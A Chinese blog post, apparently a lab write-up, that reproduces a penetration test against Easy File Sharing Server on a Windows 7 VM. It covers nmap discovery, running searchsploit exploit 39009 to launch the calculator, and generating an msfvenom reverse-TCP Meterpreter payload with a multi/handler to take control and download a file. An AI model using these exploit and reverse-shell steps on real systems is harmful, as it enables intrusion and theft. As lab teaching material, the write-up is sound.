复现任务A

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

3、利用该漏洞,使得靶机运行计算器。P116-119

在VM上打开靶机windows7和kali,在win7安装好easy file sharing 并打开。

kali上输入ifconfig查看kali的ip 为192.168.10.129

输入sudo su进入root模式使用nmap 192.168.10.129/24扫描同一子网下的主机

扫描发现 靶机ip:192.168.10.128

输入命令 nmap -sV -o easy-file.txt 192.168.10.128将扫描靶机上服务的版本记录在easy-file.txt文件里。

可以知道靶机正在运行该服务

随后使用命令searchsploit easy file sharing 

该命令可以搜索到标题和路径中包含“easy file sharing”的所有内容

选用39009的脚本searchsploit -m 39009

输入命令 python2  (+上图path) 192.168.10.128(靶机ip) 8000(easy file sharing的端口)

Done表示完成 回到win7 发现计算器已打开。

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

在kali输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.129 lport=5000 -f exe -o /var/payload.exe

在var目录下生成payload.exe文件并复制到靶机上

随后输入命令msfconsole启动meterpreter

在启动成功后按序输入

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.129

set lport 5000

回到靶机运行之前复制到靶机上的payload.exe文件

再输入命令Exploit

连接成功

使用命令ls 查看当前目录下的文件

输入download haha.txt(要下载的文件名) C:\Users\Administrator\Desktop(文件路径)

下载完成,去保存目录打开文件查看与靶机上内容相同,复现成功。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值